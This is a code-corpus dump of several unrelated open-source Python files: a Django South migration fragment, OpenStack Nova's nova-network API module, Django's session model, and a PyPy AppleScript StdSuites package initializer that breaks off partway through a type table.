'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.constellation': {
'Meta': {'object_name': 'Constellation', 'db_table': "'mapConstellations'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'constellationID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'constellationName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constellations'", 'db_column': "'regionID'", 'to': "orm['core.Region']"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
'core.region': {
'Meta': {'object_name': 'Region', 'db_table': "'mapRegions'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'regionID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'regionName'"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
'core.systemdata': {
'Meta': {'object_name': 'SystemData', 'db_table': "'mapSolarSystems'", 'managed': 'False'},
'constellation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'constellationID'", 'to': "orm['core.Constellation']"}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'solarSystemID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'solarSystemName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'regionID'", 'to': "orm['core.Region']"}),
'security': ('django.db.models.fields.FloatField', [], {}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
}
}
complete_apps = ['SiteTracker']
|
gpl-3.0
|
tealover/nova
|
nova/network/api.py
|
17
|
23539
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from nova import exception
from nova.i18n import _LI
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
if not self.skip_policy_check:
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
If it is an admin user then api will return all the
networks. If it is a normal user and nova Flat or FlatDHCP
networking is being used then api will return all
networks. Otherwise api will only return the networks which
belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context, network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
network = self.get(context, network_uuid)
if network.project_id is not None:
raise exception.NetworkInUse(network_id=network_uuid)
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not strutils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
Does not verify ownership of the fixed ip. Caller is assumed to have
checked that the instance is properly owned.
"""
orig_instance_uuid = self.floating_manager.associate_floating_ip(
context, floating_address, fixed_address, affect_auto_assigned)
if orig_instance_uuid:
msg_dict = dict(address=floating_address,
instance_id=orig_instance_uuid)
LOG.info(_LI('re-assign floating IP %(address)s from '
'instance %(instance_id)s'), msg_dict)
orig_instance = objects.Instance.get_by_uuid(context,
orig_instance_uuid)
# purge cached nw info for the original instance
base_api.update_instance_cache_with_nw_info(self, context,
orig_instance)
@wrap_check_policy
@base_api.refresh_cache
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
return self.floating_manager.disassociate_floating_ip(context, address,
affect_auto_assigned)
@wrap_check_policy
@base_api.refresh_cache
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
# NOTE(vish): We can't do the floating ip allocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
flavor = instance.get_flavor()
args = {}
args['vpn'] = vpn
args['requested_networks'] = requested_networks
args['instance_id'] = instance.uuid
args['project_id'] = instance.project_id
args['host'] = instance.host
args['rxtx_factor'] = flavor['rxtx_factor']
args['macs'] = macs
args['dhcp_options'] = dhcp_options
nw_info = self.network_rpcapi.allocate_for_instance(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'network_id': network_id}
nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'address': address}
nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
self.network_rpcapi.add_network_to_project(context, project_id,
network_uuid)
@wrap_check_policy
def associate(self, context, network_uuid, host=base_api.SENTINEL,
project=base_api.SENTINEL):
"""Associate or disassociate host or project to network."""
network = self.get(context, network_uuid)
if host is not base_api.SENTINEL:
if host is None:
objects.Network.disassociate(context, network.id,
host=True, project=False)
else:
network.host = host
network.save()
if project is not base_api.SENTINEL:
if project is None:
objects.Network.disassociate(context, network.id,
host=False, project=True)
else:
objects.Network.associate(context, project,
network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
result = self._get_instance_nw_info(context, instance)
# NOTE(comstud): Don't update API cell with new info_cache every
# time we pull network info for an instance. The periodic healing
# of info_cache causes too many cells messages. Healing the API
# will happen separately.
base_api.update_instance_cache_with_nw_info(self, context, instance,
result, update_cells=False)
return result
def _get_instance_nw_info(self, context, instance):
"""Returns all network info related to an instance."""
flavor = instance.get_flavor()
args = {'instance_id': instance.uuid,
'rxtx_factor': flavor['rxtx_factor'],
'host': instance.host,
'project_id': instance.project_id}
nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
if requested_networks:
self.network_rpcapi.validate_networks(context,
requested_networks)
# Neutron validation checks and returns how many of num_instances
# instances can be supported by the quota. For Nova network
# this is part of the subsequent quota check, so we just return
# the requested number in this case.
return num_instances
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
# This is NOOP for Nova network since it doesn't support SR-IOV.
pass
@wrap_check_policy
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'dns_type': dns_type,
'domain': domain}
return self.network_rpcapi.add_dns_entry(context, **args)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'domain': domain}
return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.delete_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
args = {'address': address, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_address(context, **args)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_name(context, **args)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
args = {'domain': domain, 'av_zone': availability_zone}
return self.network_rpcapi.create_private_dns_domain(context, **args)
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
args = {'domain': domain, 'project': project}
return self.network_rpcapi.create_public_dns_domain(context, **args)
@wrap_check_policy
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
host = host or instance.host
# NOTE(tr3buchet): host is passed in cases where we need to setup
# or teardown the networks on a host which has been migrated to/from
# and instance.host is not yet or is no longer equal to
args = {'instance_id': instance.id,
'host': host,
'teardown': teardown}
self.network_rpcapi.setup_networks_on_host(context, **args)
def _get_multi_addresses(self, context, instance):
try:
fixed_ips = objects.FixedIPList.get_by_instance_uuid(
context, instance.uuid)
except exception.FixedIpNotFoundForInstance:
return False, []
addresses = []
for fixed in fixed_ips:
for floating in fixed.floating_ips:
addresses.append(floating.address)
return fixed_ips[0].network.multi_host, addresses
@wrap_check_policy
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
flavor = instance.get_flavor()
args = dict(
instance_uuid=instance.uuid,
rxtx_factor=flavor['rxtx_factor'],
project_id=instance.project_id,
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['source_compute']
self.network_rpcapi.migrate_instance_start(context, **args)
@wrap_check_policy
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
flavor = instance.get_flavor()
args = dict(
instance_uuid=instance.uuid,
rxtx_factor=flavor['rxtx_factor'],
project_id=instance.project_id,
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['dest_compute']
self.network_rpcapi.migrate_instance_finish(context, **args)
def setup_instance_network_on_host(self, context, instance, host):
"""Setup network for specified instance on host."""
self.migrate_instance_finish(context, instance,
{'source_compute': None,
'dest_compute': host})
def cleanup_instance_network_on_host(self, context, instance, host):
"""Cleanup network for specified instance on host."""
self.migrate_instance_start(context, instance,
{'source_compute': host,
'dest_compute': None})
|
apache-2.0
|
crakensio/django_training
|
lib/python2.7/site-packages/django/contrib/sessions/models.py
|
173
|
1997
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class SessionManager(models.Manager):
def encode(self, session_dict):
"""
Returns the given session dictionary serialized and encoded as a string.
"""
return SessionStore().encode(session_dict)
def save(self, session_key, session_dict, expire_date):
s = self.model(session_key, self.encode(session_dict), expire_date)
if session_dict:
s.save()
else:
s.delete() # Clear sessions with no data.
return s
class Session(models.Model):
"""
Django provides full support for anonymous sessions. The session
framework lets you store and retrieve arbitrary data on a
per-site-visitor basis. It stores data on the server side and
abstracts the sending and receiving of cookies. Cookies contain a
session ID -- not the data itself.
The Django sessions framework is entirely cookie-based. It does
not fall back to putting session IDs in URLs. This is an intentional
design decision. Not only does that behavior make URLs ugly, it makes
your site vulnerable to session-ID theft via the "Referer" header.
For complete documentation on using Sessions in your code, consult
the sessions documentation that is shipped with Django (also available
on the Django Web site).
"""
session_key = models.CharField(_('session key'), max_length=40,
primary_key=True)
session_data = models.TextField(_('session data'))
expire_date = models.DateTimeField(_('expire date'), db_index=True)
objects = SessionManager()
class Meta:
db_table = 'django_session'
verbose_name = _('session')
verbose_name_plural = _('sessions')
def get_decoded(self):
return SessionStore().decode(self.session_data)
# At bottom to avoid circular import
from django.contrib.sessions.backends.db import SessionStore
|
cc0-1.0
|
ArneBab/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/plat-mac/lib-scriptpackages/StdSuites/__init__.py
|
73
|
12854
|
"""
Package generated from /Volumes/Sap/System Folder/Extensions/AppleScript
Resource aeut resid 0 Standard Event Suites for English
"""
from warnings import warnpy3k
warnpy3k("In 3.x, the StdSuites package is removed.", stacklevel=2)
import aetools
Error = aetools.Error
import Text_Suite
import AppleScript_Suite
import Standard_Suite
import Macintosh_Connectivity_Clas
import QuickDraw_Graphics_Suite
import QuickDraw_Graphics_Suppleme
import Required_Suite
import Table_Suite
import Type_Names_Suite
_code_to_module = {
'TEXT' : Text_Suite,
'ascr' : AppleScript_Suite,
'core' : Standard_Suite,
'macc' : Macintosh_Connectivity_Clas,
'qdrw' : QuickDraw_Graphics_Suite,
'qdsp' : QuickDraw_Graphics_Suppleme,
'reqd' : Required_Suite,
'tbls' : Table_Suite,
'tpnm' : Type_Names_Suite,
}
_code_to_fullname = {
'TEXT' : ('StdSuites.Text_Suite', 'Text_Suite'),
'ascr' : ('StdSuites.AppleScript_Suite', 'AppleScript_Suite'),
'core' : ('StdSuites.Standard_Suite', 'Standard_Suite'),
'macc' : ('StdSuites.Macintosh_Connectivity_Clas', 'Macintosh_Connectivity_Clas'),
'qdrw' : ('StdSuites.QuickDraw_Graphics_Suite', 'QuickDraw_Graphics_Suite'),
'qdsp' : ('StdSuites.QuickDraw_Graphics_Suppleme', 'QuickDraw_Graphics_Suppleme'),
'reqd' : ('StdSuites.Required_Suite', 'Required_Suite'),
'tbls' : ('StdSuites.Table_Suite', 'Table_Suite'),
'tpnm' : ('StdSuites.Type_Names_Suite', 'Type_Names_Suite'),
}
from Text_Suite import *
from AppleScript_Suite import *
from Standard_Suite import *
from Macintosh_Connectivity_Clas import *
from QuickDraw_Graphics_Suite import *
from QuickDraw_Graphics_Suppleme import *
from Required_Suite import *
from Table_Suite import *
from Type_Names_Suite import *
def getbaseclasses(v):
if not getattr(v, '_propdict', None):
v._propdict = {}
v._elemdict = {}
for superclassname in getattr(v, '_superclassnames', []):
superclass = eval(superclassname)
getbaseclasses(superclass)
v._propdict.update(getattr(superclass, '_propdict', {}))
v._elemdict.update(getattr(superclass, '_elemdict', {}))
v._propdict.update(getattr(v, '_privpropdict', {}))
v._elemdict.update(getattr(v, '_privelemdict', {}))
import StdSuites
#
# Set property and element dictionaries now that all classes have been defined
#
getbaseclasses(graphic_group)
getbaseclasses(oval)
getbaseclasses(graphic_text)
getbaseclasses(graphic_shape)
getbaseclasses(drawing_area)
getbaseclasses(graphic_line)
getbaseclasses(polygon)
getbaseclasses(pixel)
getbaseclasses(rounded_rectangle)
getbaseclasses(graphic_object)
getbaseclasses(arc)
getbaseclasses(pixel_map)
getbaseclasses(rectangle)
getbaseclasses(selection_2d_object)
getbaseclasses(application)
getbaseclasses(document)
getbaseclasses(window)
getbaseclasses(file)
getbaseclasses(alias)
getbaseclasses(insertion_point)
getbaseclasses(character)
getbaseclasses(paragraph)
getbaseclasses(word)
getbaseclasses(text_flow)
getbaseclasses(text_style_info)
getbaseclasses(line)
getbaseclasses(text)
getbaseclasses(AppleTalk_address)
getbaseclasses(address_specification)
getbaseclasses(Token_Ring_address)
getbaseclasses(FireWire_address)
getbaseclasses(bus_slot)
getbaseclasses(SCSI_address)
getbaseclasses(ADB_address)
getbaseclasses(USB_address)
getbaseclasses(device_specification)
getbaseclasses(LocalTalk_address)
getbaseclasses(IP_address)
getbaseclasses(Ethernet_address)
getbaseclasses(graphic_group)
getbaseclasses(drawing_area)
getbaseclasses(cell)
getbaseclasses(column)
getbaseclasses(table)
getbaseclasses(row)
getbaseclasses(small_integer)
getbaseclasses(system_dictionary)
getbaseclasses(color_table)
getbaseclasses(fixed_point)
getbaseclasses(plain_text)
getbaseclasses(type_element_info)
getbaseclasses(machine_location)
getbaseclasses(PostScript_picture)
getbaseclasses(type_suite_info)
getbaseclasses(menu_item)
getbaseclasses(pixel_map_record)
getbaseclasses(small_real)
getbaseclasses(null)
getbaseclasses(rotation)
getbaseclasses(fixed)
getbaseclasses(long_point)
getbaseclasses(target_id)
getbaseclasses(type_property_info)
getbaseclasses(type_parameter_info)
getbaseclasses(long_fixed_point)
getbaseclasses(bounding_rectangle)
getbaseclasses(TIFF_picture)
getbaseclasses(long_fixed)
getbaseclasses(location_reference)
getbaseclasses(version)
getbaseclasses(RGB16_color)
getbaseclasses(double_integer)
getbaseclasses(type_event_info)
getbaseclasses(point)
getbaseclasses(application_dictionary)
getbaseclasses(unsigned_integer)
getbaseclasses(menu)
getbaseclasses(fixed_rectangle)
getbaseclasses(long_fixed_rectangle)
getbaseclasses(type_class_info)
getbaseclasses(RGB96_color)
getbaseclasses(dash_style)
getbaseclasses(scrap_styles)
getbaseclasses(extended_real)
getbaseclasses(long_rectangle)
getbaseclasses(May)
getbaseclasses(string)
getbaseclasses(miles)
getbaseclasses(number_or_date)
getbaseclasses(October)
getbaseclasses(event)
getbaseclasses(Pascal_string)
getbaseclasses(zone)
getbaseclasses(picture)
getbaseclasses(list_or_string)
getbaseclasses(number)
getbaseclasses(Tuesday)
getbaseclasses(version)
getbaseclasses(December)
getbaseclasses(square_kilometres)
getbaseclasses(reference)
getbaseclasses(vector)
getbaseclasses(weekday)
getbaseclasses(Sunday)
getbaseclasses(international_text)
getbaseclasses(seconds)
getbaseclasses(RGB_color)
getbaseclasses(kilometres)
getbaseclasses(styled_Unicode_text)
getbaseclasses(missing_value)
getbaseclasses(metres)
getbaseclasses(number_or_string)
getbaseclasses(list)
getbaseclasses(linked_list)
getbaseclasses(real)
getbaseclasses(encoded_string)
getbaseclasses(list_or_record)
getbaseclasses(Monday)
getbaseclasses(September)
getbaseclasses(anything)
getbaseclasses(property)
getbaseclasses(reference_form)
getbaseclasses(item)
getbaseclasses(grams)
getbaseclasses(record)
getbaseclasses(empty_ae_name_)
getbaseclasses(constant)
getbaseclasses(square_miles)
getbaseclasses(data)
getbaseclasses(Unicode_text)
getbaseclasses(yards)
getbaseclasses(cubic_yards)
getbaseclasses(pounds)
getbaseclasses(cubic_centimetres)
getbaseclasses(text)
getbaseclasses(July)
getbaseclasses(cubic_metres)
getbaseclasses(styled_text)
getbaseclasses(number_2c__date_or_text)
getbaseclasses(feet)
getbaseclasses(February)
getbaseclasses(degrees_Celsius)
getbaseclasses(keystroke)
getbaseclasses(integer)
getbaseclasses(degrees_Fahrenheit)
getbaseclasses(list_2c__record_or_text)
getbaseclasses(date)
getbaseclasses(degrees_Kelvin)
getbaseclasses(centimetres)
getbaseclasses(writing_code)
getbaseclasses(alias_or_string)
getbaseclasses(writing_code_info)
getbaseclasses(text_item)
getbaseclasses(machine)
getbaseclasses(type_class)
getbaseclasses(preposition)
getbaseclasses(Wednesday)
getbaseclasses(upper_case)
getbaseclasses(March)
getbaseclasses(square_feet)
getbaseclasses(November)
getbaseclasses(quarts)
getbaseclasses(alias)
getbaseclasses(January)
getbaseclasses(month)
getbaseclasses(June)
getbaseclasses(August)
getbaseclasses(styled_Clipboard_text)
getbaseclasses(gallons)
getbaseclasses(cubic_inches)
getbaseclasses(Friday)
getbaseclasses(sound)
getbaseclasses(class_)
getbaseclasses(kilograms)
getbaseclasses(script)
getbaseclasses(litres)
getbaseclasses(boolean)
getbaseclasses(square_metres)
getbaseclasses(inches)
getbaseclasses(character)
getbaseclasses(April)
getbaseclasses(ounces)
getbaseclasses(app)
getbaseclasses(handler)
getbaseclasses(C_string)
getbaseclasses(Thursday)
getbaseclasses(square_yards)
getbaseclasses(cubic_feet)
getbaseclasses(Saturday)
getbaseclasses(file_specification)
#
# Indices of types declared in this module
#
_classdeclarations = {
'cpic' : graphic_group,
'covl' : oval,
'cgtx' : graphic_text,
'cgsh' : graphic_shape,
'cdrw' : drawing_area,
'glin' : graphic_line,
'cpgn' : polygon,
'cpxl' : pixel,
'crrc' : rounded_rectangle,
'cgob' : graphic_object,
'carc' : arc,
'cpix' : pixel_map,
'crec' : rectangle,
'csel' : selection_2d_object,
'capp' : application,
'docu' : document,
'cwin' : window,
'file' : file,
'alis' : alias,
'cins' : insertion_point,
'cha ' : character,
'cpar' : paragraph,
'cwor' : word,
'cflo' : text_flow,
'tsty' : text_style_info,
'clin' : line,
'ctxt' : text,
'cat ' : AppleTalk_address,
'cadr' : address_specification,
'ctok' : Token_Ring_address,
'cfw ' : FireWire_address,
'cbus' : bus_slot,
'cscs' : SCSI_address,
'cadb' : ADB_address,
'cusb' : USB_address,
'cdev' : device_specification,
'clt ' : LocalTalk_address,
'cip ' : IP_address,
'cen ' : Ethernet_address,
'cpic' : graphic_group,
'cdrw' : drawing_area,
'ccel' : cell,
'ccol' : column,
'ctbl' : table,
'crow' : row,
'shor' : small_integer,
'aeut' : system_dictionary,
'clrt' : color_table,
'fpnt' : fixed_point,
'TEXT' : plain_text,
'elin' : type_element_info,
'mLoc' : machine_location,
'EPS ' : PostScript_picture,
'suin' : type_suite_info,
'cmen' : menu_item,
'tpmm' : pixel_map_record,
'sing' : small_real,
'null' : null,
'trot' : rotation,
'fixd' : fixed,
'lpnt' : long_point,
'targ' : target_id,
'pinf' : type_property_info,
'pmin' : type_parameter_info,
'lfpt' : long_fixed_point,
'qdrt' : bounding_rectangle,
'TIFF' : TIFF_picture,
'lfxd' : long_fixed,
'insl' : location_reference,
'vers' : version,
'tr16' : RGB16_color,
'comp' : double_integer,
'evin' : type_event_info,
'QDpt' : point,
'aete' : application_dictionary,
'magn' : unsigned_integer,
'cmnu' : menu,
'frct' : fixed_rectangle,
'lfrc' : long_fixed_rectangle,
'gcli' : type_class_info,
'tr96' : RGB96_color,
'tdas' : dash_style,
'styl' : scrap_styles,
'exte' : extended_real,
'lrct' : long_rectangle,
'may ' : May,
'TEXT' : string,
'mile' : miles,
'nd ' : number_or_date,
'oct ' : October,
'evnt' : event,
'pstr' : Pascal_string,
'zone' : zone,
'PICT' : picture,
